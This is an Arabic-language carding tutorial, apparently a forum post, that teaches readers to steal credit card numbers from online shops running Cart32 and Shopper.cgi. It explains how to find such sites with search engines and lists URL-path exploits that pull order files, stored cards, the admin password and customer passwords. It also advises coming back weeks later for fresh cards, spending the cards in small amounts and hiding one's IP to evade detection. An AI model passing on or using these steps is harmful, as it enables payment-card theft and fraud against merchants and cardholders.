--------------------------------------------------------------------------------
الكثير يرى مننا هذه الرموز ولا يعرف الى ماذا تعني ..
Cvv2 = CC with cvv code
Cvv = same with cvv2
cc = credit card
لدرس اليوم ينقسم الى :
اولا : عبر مواقع ذات نظام Cart32
ثانيا : عبر الـ Shopper.cgi
عبر مواقع ذات نظام Cart32 :
1.) ايجاد مواقع بأنظمة Cart32
2.) هل هذه المواقع مصابة ؟
3.) الثغرات .
4.) العودة مرة اخرى في المستقبل .
-----------------------------
اولا / ايجاد المواقع الشرائية :
-----------------------------
لإيجاد مثل تلك المواقع امر سهل على الجميع .. , كل ما عليك هو الذهاب لأي محرك بحث قوي مثل
www.google.com او
www.Av.com " المفضل لدي " و من ثم تقوم بالكتابة في مربع البحث عن :
Cart32.exe v3
و التي سوف تقوم بإحضار جميع مواقع الـ cart32.exe ذات الإصدار V*.3 و الذي يعد اكثر الإصدارات المصابة ..
عشان كذا اولا ما تلاقي اي موقع لـ cart32 على طول لا تسيبه يفوت منك ..
-----------------------------
ثانيا : هل الموقع مصاب بثغرة ؟
-----------------------------
و هذا سهل كل ما عليك انك تطالع في هذا الجدول بالأسفل و تشوف الإصدارات و نسبة اصابتها :
v2.5 مصاب 80 %
v3.0 مصاب 60 %
v3.5 مصاب 30 %
v4.0 غير مصاب " حتى الآن "
-----------------------------
ثالثا / The Exploits !
-----------------------------
هذا هو الجزء المهم .. كيفية استخدام الثغرات و هو اسهل ما يمكن ..
فعندما نصل الى احد الـ Cart32 Site مثل :
http://www.example.com/cgi-bin/cart32.exe/whateve???r
كيف نحصل على الكروت الشرائية الموجودة داخله ؟
سنقوم بإضافة الإكسبلوتات الى نهاية الموقع مثل :
http://www.example.com/cgi-bin/cart...ever-ORDERS.txt
http://www.example.com/cgi-bin/cart...teve-OUTPUT.txt
الحصول على باسورد الأدمن :
http://www.example.com/cgi-bin/cart32.ini
الحصول على باسورد العملاء :
http://www.example.com/cgi-bin/cart...art32clientlist
رؤية المجلدات داخل الموقع :
http://www.example.com/cgi-bin/cart32.exe/error
يوجد الكثير جدا من الثغرات التي يمكن استخدامها " يمكنكم البحث في جوجل"
-----------------------------
رابعا / العودة في المستقبل :
-----------------------------
عندك الحصول على الكروت الشرائية من المواقع ... و مازالت الشركة و الموقع يستقبل الطلبات ..
الحين تكون انت وقعت على كنز هههههههههههههه ليش ؟
لأنك تقدر ترجع بعد كم اسبوع و تاخد الفيز الجديدة مرة ثانية " يا حظك "
اول ما تاخد الفيز .. لا تحاول تاخد منها الكثير او تعطيها لأحد حتى لا تشك الشركة فيكم
................................... ............... ................................... ............
الطريقة الثانية و هي عبر اختراق الـ Shopper.cgi و يتكون من :
1.) ايجاد مواقع الـ Shopper.cgi .
2.) تجريب الإكسبلوتات عليها .
3.) العودة مرة أخرى للحصول على المزيد .
----------------
أولا / ايجاد الـ Shopper.CgI Site's :
----------------
مثل المرة اللي فاتت .. تروح لمحرك البحث اللي انت تفضله مثل :
www.Av.com
و تكتب في صندوق البحث SHOPPER.CGI و تبحث في المواقع حتى تجد مواقع يوجد في اسمه SHOPPER.CGI
مثال :
www.example.com/xxxx/SHOPPER.CGI/xxxx
----------------
تجريب الإكسبلوتات :
----------------
لو كان عندك احد المواقع التي يوجد بها الـ shopper.cgi .. تروح تضيف بعدها الإكسبلوتات
" مثل المرة اللي فاتت "
و يوجد الكثير من الإكسبلوتات مثل :
&TEMPLATE=ORDER.LOG
التي تضاف في نهاية اسم الموقع .. و يمكنك البحث عن المزيد في جوجل ...
----------------
العودة مرة اخرى في المستقبل :
----------------
نفس اللي قلته قبل كذا ..
................................... ............... ........................
لا تنسى اخفائك للأي بي لحمايتك الشخصية اثناء استخدامك للفيزا ..